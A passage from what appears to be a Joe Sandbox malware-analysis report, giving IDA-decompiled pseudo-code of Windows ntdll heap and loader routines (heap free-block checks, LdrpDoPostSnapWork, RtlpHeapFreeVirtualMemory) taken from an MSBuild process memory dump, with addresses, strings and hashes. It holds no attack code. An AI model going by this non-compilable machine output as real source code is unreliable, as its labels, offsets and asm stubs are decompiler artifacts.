                                            														_v12 = _t196;
                                            													}
                                            												}
                                            												_t162 =  &(_t420[4]); // -8
                                            												_t197 = E0105D540(_t162, _t196, 0xfeeefeee);
                                            												_v20 = _t197;
                                            												__eflags = _t197 - _v12;
                                            												if(_t197 != _v12) {
                                            													_t335 =  *[fs:0x30];
                                            													__eflags =  *(_t335 + 0xc);
                                            													if( *(_t335 + 0xc) == 0) {
                                            														_push("HEAP: ");
                                            														E0100B150();
                                            													} else {
                                            														E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            													}
                                            													_push(_v20 + 0x10 + _t420);
                                            													E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                            													_t203 =  *[fs:0x30];
                                            													__eflags =  *((char*)(_t203 + 2));
                                            													if( *((char*)(_t203 + 2)) != 0) {
                                            														 *0x10f6378 = 1;
                                            														asm("int3");
                                            														 *0x10f6378 = 0;
                                            													}
                                            												}
                                            											}
                                            											_t394 = _a4;
                                            											_t414[1] = 0;
                                            											_t414[3] = 0;
                                            											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                            											 *_t414 =  *_t394;
                                            											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                            											break;
                                            										}
                                            										_t207 = E0102A229(_t307, _t420);
                                            										__eflags = _t207;
                                            										if(_t207 != 0) {
                                            											goto L107;
                                            										}
                                            										E0102A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                            										continue;
                                            									}
                                            									_t342 =  *_t420 & 0x0000ffff;
                                            									while(1) {
                                            										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                            										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                            											break;
                                            										}
                                            										_t210 =  *_t393;
                                            										__eflags = _t210;
                                            										if(_t210 == 0) {
                                            											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                            											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                            											L103:
                                            											_t146 =  &(_t420[2]); // -16
                                            											E0102BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                            											goto L104;
                                            										}
                                            										_t393 = _t210;
                                            									}
                                            									_t212 = _t342;
                                            									goto L103;
                                            								} else {
                                            									_t384 = _t414[6];
                                            									_t102 =  &(_t414[4]); // -16
                                            									_t311 = _t102;
                                            									_t215 =  *_t311;
                                            									_v20 = _t215;
                                            									_v16 = _t384;
                                            									_t216 =  *((intOrPtr*)(_t215 + 4));
                                            									__eflags =  *_t384 - _t216;
                                            									if( *_t384 != _t216) {
                                            										L92:
                                            										_push(_t311);
                                            										_push( *_t384);
                                            										E010CA80D(_t307, 0xd, _t311, _t216);
                                            										L93:
                                            										_v5 = 0;
                                            										goto L94;
                                            									}
                                            									__eflags =  *_t384 - _t311;
                                            									if( *_t384 != _t311) {
                                            										goto L92;
                                            									}
                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                            									_t386 =  *(_t307 + 0xb4);
                                            									__eflags = _t386;
                                            									if(_t386 == 0) {
                                            										L79:
                                            										_t313 = _v16;
                                            										_t219 = _v20;
                                            										 *_t313 = _t219;
                                            										 *(_t219 + 4) = _t313;
                                            										__eflags = _t414[1] & 0x00000008;
                                            										if((_t414[1] & 0x00000008) == 0) {
                                            											L82:
                                            											_t314 = _t414[1];
                                            											__eflags = _t314 & 0x00000004;
                                            											if((_t314 & 0x00000004) != 0) {
                                            												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                            												_v12 = _t221;
                                            												__eflags = _t314 & 0x00000002;
                                            												if((_t314 & 0x00000002) != 0) {
                                            													__eflags = _t221 - 4;
                                            													if(_t221 > 4) {
                                            														_t221 = _t221 - 4;
                                            														__eflags = _t221;
                                            														_v12 = _t221;
                                            													}
                                            												}
                                            												_t127 =  &(_t414[8]); // -8
                                            												_t222 = E0105D540(_t127, _t221, 0xfeeefeee);
                                            												_v20 = _t222;
                                            												__eflags = _t222 - _v12;
                                            												if(_t222 != _v12) {
                                            													_t316 =  *[fs:0x30];
                                            													__eflags =  *(_t316 + 0xc);
                                            													if( *(_t316 + 0xc) == 0) {
                                            														_push("HEAP: ");
                                            														E0100B150();
                                            													} else {
                                            														E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            													}
                                            													_push(_v20 + 0x10 + _t414);
                                            													E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                            													_t228 =  *[fs:0x30];
                                            													_t421 = _t421 + 0xc;
                                            													__eflags =  *((char*)(_t228 + 2));
                                            													if( *((char*)(_t228 + 2)) != 0) {
                                            														 *0x10f6378 = 1;
                                            														asm("int3");
                                            														 *0x10f6378 = 0;
                                            													}
                                            												}
                                            											}
                                            											goto L93;
                                            										}
                                            										_t232 = E0102A229(_t307, _t414);
                                            										__eflags = _t232;
                                            										if(_t232 != 0) {
                                            											goto L82;
                                            										}
                                            										E0102A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                            										goto L93;
                                            									}
                                            									_t323 =  *_t414 & 0x0000ffff;
                                            									while(1) {
                                            										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                            										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                            											break;
                                            										}
                                            										_t235 =  *_t386;
                                            										__eflags = _t235;
                                            										if(_t235 == 0) {
                                            											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                            											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                            											L78:
                                            											_t111 =  &(_t414[4]); // -16
                                            											E0102BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                            											goto L79;
                                            										}
                                            										_t386 = _t235;
                                            									}
                                            									_t237 = _t323;
                                            									goto L78;
                                            								}
                                            							}
                                            							return _t414;
                                            						}
                                            						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                            						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                            						if(_t398 >> 0x18 != _t347) {
                                            							_push(_t347);
                                            							_push(0);
                                            							_push(0);
                                            							_push(_t420);
                                            							_push(3);
                                            							goto L64;
                                            						}
                                            						goto L6;
                                            					} else {
                                            						_t277 =  *_t419 & 0x0000ffff;
                                            						_v16 = _t277;
                                            						while(1) {
                                            							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                            							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                            								break;
                                            							}
                                            							_t279 =  *_t404;
                                            							__eflags = _t279;
                                            							if(_t279 == 0) {
                                            								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                            								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                            								break;
                                            							} else {
                                            								_t404 = _t279;
                                            								_t277 =  *_t419 & 0x0000ffff;
                                            								continue;
                                            							}
                                            						}
                                            						E0102BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                            						goto L20;
                                            					}
                                            				}
                                            			}
                                            0x010718c8
                                            0x010718ca
                                            0x010718ca
                                            0x010718cd
                                            0x010718cd
                                            0x010718c8
                                            0x010718d5
                                            0x010718da
                                            0x010718df
                                            0x010718e2
                                            0x010718e5
                                            0x010718e7
                                            0x010718ee
                                            0x010718f2
                                            0x01071912
                                            0x01071917
                                            0x010718f4
                                            0x0107190a
                                            0x0107190f
                                            0x01071925
                                            0x0107192c
                                            0x01071931
                                            0x0107193a
                                            0x0107193e
                                            0x01071940
                                            0x01071947
                                            0x01071948
                                            0x01071948
                                            0x0107193e
                                            0x010718e5
                                            0x0107194f
                                            0x01071952
                                            0x01071956
                                            0x0107195d
                                            0x01071961
                                            0x0107196d
                                            0x00000000
                                            0x0107196d
                                            0x0107188a
                                            0x0107188f
                                            0x01071891
                                            0x00000000
                                            0x00000000
                                            0x0107189d
                                            0x00000000
                                            0x0107189d
                                            0x0107184c
                                            0x01071859
                                            0x01071859
                                            0x0107185c
                                            0x00000000
                                            0x00000000
                                            0x01071851
                                            0x01071853
                                            0x01071855
                                            0x01071865
                                            0x01071865
                                            0x01071866
                                            0x01071868
                                            0x01071870
                                            0x00000000
                                            0x01071870
                                            0x01071857
                                            0x01071857
                                            0x0107185e
                                            0x00000000
                                            0x010716d2
                                            0x010716d2
                                            0x010716d5
                                            0x010716d5
                                            0x010716d8
                                            0x010716da
                                            0x010716dd
                                            0x010716e0
                                            0x010716e3
                                            0x010716e5
                                            0x01071808
                                            0x01071808
                                            0x01071809
                                            0x01071812
                                            0x01071817
                                            0x01071817
                                            0x00000000
                                            0x01071817
                                            0x010716eb
                                            0x010716ed
                                            0x00000000
                                            0x00000000
                                            0x010716f6
                                            0x010716f9
                                            0x010716ff
                                            0x01071701
                                            0x0107172c
                                            0x0107172c
                                            0x0107172f
                                            0x01071732
                                            0x01071734
                                            0x01071737
                                            0x0107173b
                                            0x0107175e
                                            0x0107175e
                                            0x01071761
                                            0x01071764
                                            0x0107176d
                                            0x01071774
                                            0x01071777
                                            0x0107177a
                                            0x0107177c
                                            0x0107177f
                                            0x01071781
                                            0x01071781
                                            0x01071784
                                            0x01071784
                                            0x0107177f
                                            0x0107178c
                                            0x01071791
                                            0x01071796
                                            0x01071799
                                            0x0107179c
                                            0x0107179e
                                            0x010717a5
                                            0x010717a9
                                            0x010717c9
                                            0x010717ce
                                            0x010717ab
                                            0x010717c1
                                            0x010717c6
                                            0x010717dc
                                            0x010717e3
                                            0x010717e8
                                            0x010717ee
                                            0x010717f1
                                            0x010717f5
                                            0x010717f7
                                            0x010717fe
                                            0x010717ff
                                            0x010717ff
                                            0x010717f5
                                            0x0107179c
                                            0x00000000
                                            0x01071764
                                            0x01071741
                                            0x01071746
                                            0x01071748
                                            0x00000000
                                            0x00000000
                                            0x01071754
                                            0x00000000
                                            0x01071754
                                            0x01071703
                                            0x01071710
                                            0x01071710
                                            0x01071713
                                            0x00000000
                                            0x00000000
                                            0x01071708
                                            0x0107170a
                                            0x0107170c
                                            0x0107171c
                                            0x0107171c
                                            0x0107171d
                                            0x0107171f
                                            0x01071727
                                            0x00000000
                                            0x01071727
                                            0x0107170e
                                            0x0107170e
                                            0x01071715
                                            0x00000000
                                            0x01071715
                                            0x010716cc
                                            0x01029a45
                                            0x01029a45
                                            0x01029a0e
                                            0x01029a1c
                                            0x01029a23
                                            0x0107167e
                                            0x0107167f
                                            0x01071681
                                            0x01071683
                                            0x01071684
                                            0x00000000
                                            0x01071684
                                            0x00000000
                                            0x01029aad
                                            0x01029aad
                                            0x01029ab0
                                            0x01029ab3
                                            0x01029ab3
                                            0x01029ab6
                                            0x00000000
                                            0x00000000
                                            0x01029ab8
                                            0x01029aba
                                            0x01029abc
                                            0x01029ac8
                                            0x01029ac8
                                            0x00000000
                                            0x01029abe
                                            0x01029abe
                                            0x01029ac0
                                            0x00000000
                                            0x01029ac0
                                            0x01029abc
                                            0x01029ad2
                                            0x00000000
                                            0x01029ad2
                                            0x01029aab

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 93aad1e2aaa0f5d482b1c43bdc2e8b27dc581409c0dd949249b55e291f91bfdc
                                            • Instruction ID: e908414d79f1d766c3818312d1c5a674f7f96bed7a08f99232eea0527865da17
                                            • Opcode Fuzzy Hash: 93aad1e2aaa0f5d482b1c43bdc2e8b27dc581409c0dd949249b55e291f91bfdc
                                            • Instruction Fuzzy Hash: BF22D270A00256DFEB65CF2CC485BBABBF5EF45704F1885A9E8C58B282E735D885CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E01018794(void* __ecx) {
                                            				signed int _v0;
                                            				char _v8;
                                            				signed int _v12;
                                            				void* _v16;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v40;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t77;
                                            				signed int _t80;
                                            				signed char _t81;
                                            				signed int _t87;
                                            				signed int _t91;
                                            				void* _t92;
                                            				void* _t94;
                                            				signed int _t95;
                                            				signed int _t103;
                                            				signed int _t105;
                                            				signed int _t110;
                                            				signed int _t118;
                                            				intOrPtr* _t121;
                                            				intOrPtr _t122;
                                            				signed int _t125;
                                            				signed int _t129;
                                            				signed int _t131;
                                            				signed int _t134;
                                            				signed int _t136;
                                            				signed int _t143;
                                            				signed int* _t147;
                                            				signed int _t151;
                                            				void* _t153;
                                            				signed int* _t157;
                                            				signed int _t159;
                                            				signed int _t161;
                                            				signed int _t166;
                                            				signed int _t168;
                                            
                                            				_push(__ecx);
                                            				_t153 = __ecx;
                                            				_t159 = 0;
                                            				_t121 = __ecx + 0x3c;
                                            				if( *_t121 == 0) {
                                            					L2:
                                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                            							L6:
                                            							if(E0101934A() != 0) {
                                            								_t159 = E0108A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                            								__eflags = _t159;
                                            								if(_t159 < 0) {
                                            									_t81 =  *0x10f5780; // 0x0
                                            									__eflags = _t81 & 0x00000003;
                                            									if((_t81 & 0x00000003) != 0) {
                                            										_push(_t159);
                                            										E01085510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                            										_t81 =  *0x10f5780; // 0x0
                                            									}
                                            									__eflags = _t81 & 0x00000010;
                                            									if((_t81 & 0x00000010) != 0) {
                                            										asm("int3");
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							_t159 = E0101849B(0, _t122, _t153, _t159, _t180);
                                            							if(_t159 >= 0) {
                                            								goto L6;
                                            							}
                                            						}
                                            						_t80 = _t159;
                                            						goto L8;
                                            					} else {
                                            						_t125 = 0x13;
                                            						asm("int 0x29");
                                            						_push(0);
                                            						_push(_t159);
                                            						_t161 = _t125;
                                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                                            						_t143 = 0;
                                            						_v40 = _t161;
                                            						_t118 = 0;
                                            						_push(_t153);
                                            						__eflags = _t87;
                                            						if(_t87 != 0) {
                                            							_t118 = _t87 + 0x5d8;
                                            							__eflags = _t118;
                                            							if(_t118 == 0) {
                                            								L46:
                                            								_t118 = 0;
                                            							} else {
                                            								__eflags =  *(_t118 + 0x30);
                                            								if( *(_t118 + 0x30) == 0) {
                                            									goto L46;
                                            								}
                                            							}
                                            						}
                                            						_v32 = 0;
                                            						_v28 = 0;
                                            						_v16 = 0;
                                            						_v20 = 0;
                                            						_v12 = 0;
                                            						__eflags = _t118;
                                            						if(_t118 != 0) {
                                            							__eflags = _t161;
                                            							if(_t161 != 0) {
                                            								__eflags =  *(_t118 + 8);
                                            								if( *(_t118 + 8) == 0) {
                                            									L22:
                                            									_t143 = 1;
                                            									__eflags = 1;
                                            								} else {
                                            									_t19 = _t118 + 0x40; // 0x40
                                            									_t156 = _t19;
                                            									E01018999(_t19,  &_v16);
                                            									__eflags = _v0;
                                            									if(_v0 != 0) {
                                            										__eflags = _v0 - 1;
                                            										if(_v0 != 1) {
                                            											goto L22;
                                            										} else {
                                            											_t128 =  *(_t161 + 0x64);
                                            											__eflags =  *(_t161 + 0x64);
                                            											if( *(_t161 + 0x64) == 0) {
                                            												goto L22;
                                            											} else {
                                            												E01018999(_t128,  &_v12);
                                            												_t147 = _v12;
                                            												_t91 = 0;
                                            												__eflags = 0;
                                            												_t129 =  *_t147;
                                            												while(1) {
                                            													__eflags =  *((intOrPtr*)(0x10f5c60 + _t91 * 8)) - _t129;
                                            													if( *((intOrPtr*)(0x10f5c60 + _t91 * 8)) == _t129) {
                                            														break;
                                            													}
                                            													_t91 = _t91 + 1;
                                            													__eflags = _t91 - 5;
                                            													if(_t91 < 5) {
                                            														continue;
                                            													} else {
                                            														_t131 = 0;
                                            														__eflags = 0;
                                            													}
                                            													L37:
                                            													__eflags = _t131;
                                            													if(_t131 != 0) {
                                            														goto L22;
                                            													} else {
                                            														__eflags = _v16 - _t147;
                                            														if(_v16 != _t147) {
                                            															goto L22;
                                            														} else {
                                            															E01022280(_t92, 0x10f86cc);
                                            															_t94 = E010D9DFB( &_v20);
                                            															__eflags = _t94 - 1;
                                            															if(_t94 != 1) {
                                            															}
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															_t95 = E010361A0( &_v32);
                                            															__eflags = _t95;
                                            															if(_t95 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t71 = _t118 + 0x40; // 0x3f
                                            																	_t134 = _t71;
                                            																	goto L55;
                                            																}
                                            															}
                                            															goto L30;
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												_t92 = 0x10f5c64 + _t91 * 8;
                                            												asm("lock xadd [eax], ecx");
                                            												_t131 = (_t129 | 0xffffffff) - 1;
                                            												goto L37;
                                            											}
                                            										}
                                            										goto L56;
                                            									} else {
                                            										_t143 = E01018A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                            										__eflags = _t143;
                                            										if(_t143 != 0) {
                                            											_t157 = _v12;
                                            											_t103 = 0;
                                            											__eflags = 0;
                                            											_t136 =  &(_t157[1]);
                                            											 *(_t161 + 0x64) = _t136;
                                            											_t151 =  *_t157;
                                            											_v20 = _t136;
                                            											while(1) {
                                            												__eflags =  *((intOrPtr*)(0x10f5c60 + _t103 * 8)) - _t151;
                                            												if( *((intOrPtr*)(0x10f5c60 + _t103 * 8)) == _t151) {
                                            													break;
                                            												}
                                            												_t103 = _t103 + 1;
                                            												__eflags = _t103 - 5;
                                            												if(_t103 < 5) {
                                            													continue;
                                            												}
                                            												L21:
                                            												_t105 = E0104F380(_t136, 0xfe1184, 0x10);
                                            												__eflags = _t105;
                                            												if(_t105 != 0) {
                                            													__eflags =  *_t157 -  *_v16;
                                            													if( *_t157 >=  *_v16) {
                                            														goto L22;
                                            													} else {
                                            														asm("cdq");
                                            														_t166 = _t157[5] & 0x0000ffff;
                                            														_t108 = _t157[5] & 0x0000ffff;
                                            														asm("cdq");
                                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                            														if(__eflags > 0) {
                                            															L29:
                                            															E01022280(_t108, 0x10f86cc);
                                            															 *_t118 =  *_t118 + 1;
                                            															_t42 = _t118 + 0x40; // 0x3f
                                            															_t156 = _t42;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															_t110 = E010361A0( &_v32);
                                            															__eflags = _t110;
                                            															if(_t110 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t134 = _v20;
                                            																	L55:
                                            																	E010D9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                            																}
                                            															}
                                            															L30:
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															E0101FFB0(_t118, _t156, 0x10f86cc);
                                            															goto L22;
                                            														} else {
                                            															if(__eflags < 0) {
                                            																goto L22;
                                            															} else {
                                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                            																	goto L22;
                                            																} else {
                                            																	goto L29;
                                            																}
                                            															}
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												goto L22;
                                            											}
                                            											asm("lock inc dword [eax]");
                                            											goto L21;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						return _t143;
                                            					}
                                            				} else {
                                            					_push( &_v8);
                                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                                            					_push(__ecx + 0x40);
                                            					_push(_t121);
                                            					_push(0xffffffff);
                                            					_t80 = E01049A00();
                                            					_t159 = _t80;
                                            					if(_t159 < 0) {
                                            						L8:
                                            						return _t80;
                                            					} else {
                                            						goto L2;
                                            					}
                                            				}
                                            				L56:
                                            			}

                                            Strings
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01069C28
                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01069C18
                                            • LdrpDoPostSnapWork, xrefs: 01069C1E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 2994545307-1948996284
                                            • Opcode ID: 85d466b07d855b5d3e1a15ded5e494a52c4f355bc713da385ea3254019ac81bf
                                            • Instruction ID: cce02aa055c6f45f39694338061b68070e7e40545bf47b2c89023ffce10d71f4
                                            • Opcode Fuzzy Hash: 85d466b07d855b5d3e1a15ded5e494a52c4f355bc713da385ea3254019ac81bf
                                            • Instruction Fuzzy Hash: B091F431A0021AAFDF58DF59D881ABA77F5FF44314B1881AADEC5AB548D734EA01CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0103AC7B(void* __ecx, signed short* __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				void* __ebx;
                                            				signed char _t75;
                                            				signed int _t79;
                                            				signed int _t88;
                                            				intOrPtr _t89;
                                            				signed int _t96;
                                            				signed char* _t97;
                                            				intOrPtr _t98;
                                            				signed int _t101;
                                            				signed char* _t102;
                                            				intOrPtr _t103;
                                            				signed int _t105;
                                            				signed char* _t106;
                                            				signed int _t131;
                                            				signed int _t138;
                                            				void* _t149;
                                            				signed short* _t150;
                                            
                                            				_t150 = __edx;
                                            				_t149 = __ecx;
                                            				_t70 =  *__edx & 0x0000ffff;
                                            				__edx[1] = __edx[1] & 0x000000f8;
                                            				__edx[3] = 0;
                                            				_v8 =  *__edx & 0x0000ffff;
                                            				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                            					_t39 =  &(_t150[8]); // 0x8
                                            					E0105D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                            					__edx[1] = __edx[1] | 0x00000004;
                                            				}
                                            				_t75 =  *(_t149 + 0xcc) ^  *0x10f8a68;
                                            				if(_t75 != 0) {
                                            					L4:
                                            					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                            						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                            						_t79 =  *(_t149 + 0x50);
                                            						 *_t150 =  *_t150 ^ _t79;
                                            						return _t79;
                                            					}
                                            					return _t75;
                                            				} else {
                                            					_t9 =  &(_t150[0x80f]); // 0x1017
                                            					_t138 = _t9 & 0xfffff000;
                                            					_t10 =  &(_t150[0x14]); // 0x20
                                            					_v12 = _t138;
                                            					if(_t138 == _t10) {
                                            						_t138 = _t138 + 0x1000;
                                            						_v12 = _t138;
                                            					}
                                            					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                            					if(_t75 > _t138) {
                                            						_v8 = _t75 - _t138;
                                            						_push(0x4000);
                                            						_push( &_v8);
                                            						_push( &_v12);
                                            						_push(0xffffffff);
                                            						_t131 = E010496E0();
                                            						__eflags = _t131 - 0xc0000045;
                                            						if(_t131 == 0xc0000045) {
                                            							_t88 = E010B3C60(_v12, _v8);
                                            							__eflags = _t88;
                                            							if(_t88 != 0) {
                                            								_push(0x4000);
                                            								_push( &_v8);
                                            								_push( &_v12);
                                            								_push(0xffffffff);
                                            								_t131 = E010496E0();
                                            							}
                                            						}
                                            						_t89 =  *[fs:0x30];
                                            						__eflags = _t131;
                                            						if(_t131 < 0) {
                                            							__eflags =  *(_t89 + 0xc);
                                            							if( *(_t89 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_v8);
                                            							_push(_v12);
                                            							_push(_t149);
                                            							_t75 = E0100B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                            							goto L4;
                                            						} else {
                                            							_t96 =  *(_t89 + 0x50);
                                            							_t132 = 0x7ffe0380;
                                            							__eflags = _t96;
                                            							if(_t96 != 0) {
                                            								__eflags =  *_t96;
                                            								if( *_t96 == 0) {
                                            									goto L10;
                                            								}
                                            								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            								L11:
                                            								__eflags =  *_t97;
                                            								if( *_t97 != 0) {
                                            									_t98 =  *[fs:0x30];
                                            									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                            									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                            										E010C14FB(_t132, _t149, _v12, _v8, 7);
                                            									}
                                            								}
                                            								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                            								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                            								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                            								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                            								_t101 =  *( *[fs:0x30] + 0x50);
                                            								__eflags = _t101;
                                            								if(_t101 != 0) {
                                            									__eflags =  *_t101;
                                            									if( *_t101 == 0) {
                                            										goto L13;
                                            									}
                                            									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            									goto L14;
                                            								} else {
                                            									L13:
                                            									_t102 = _t132;
                                            									L14:
                                            									__eflags =  *_t102;
                                            									if( *_t102 != 0) {
                                            										_t103 =  *[fs:0x30];
                                            										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                            										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                            											__eflags = E01027D50();
                                            											if(__eflags != 0) {
                                            												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                            											}
                                            											E010C1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                            										}
                                            									}
                                            									_t133 = 0x7ffe038a;
                                            									_t105 =  *( *[fs:0x30] + 0x50);
                                            									__eflags = _t105;
                                            									if(_t105 != 0) {
                                            										__eflags =  *_t105;
                                            										if( *_t105 == 0) {
                                            											goto L16;
                                            										}
                                            										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                            										goto L17;
                                            									} else {
                                            										L16:
                                            										_t106 = _t133;
                                            										L17:
                                            										__eflags =  *_t106;
                                            										if( *_t106 != 0) {
                                            											__eflags = E01027D50();
                                            											if(__eflags != 0) {
                                            												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                            											}
                                            											E010C1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                            										}
                                            										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                            										_t150[1] = _t75;
                                            										goto L4;
                                            									}
                                            								}
                                            							}
                                            							L10:
                                            							_t97 = _t132;
                                            							goto L11;
                                            						}
                                            					} else {
                                            						goto L4;
                                            					}
                                            				}
                                            			}


                                            Strings
                                            • HEAP: , xrefs: 0107A0BA
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0107A0CD
                                            • HEAP[%wZ]: , xrefs: 0107A0AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
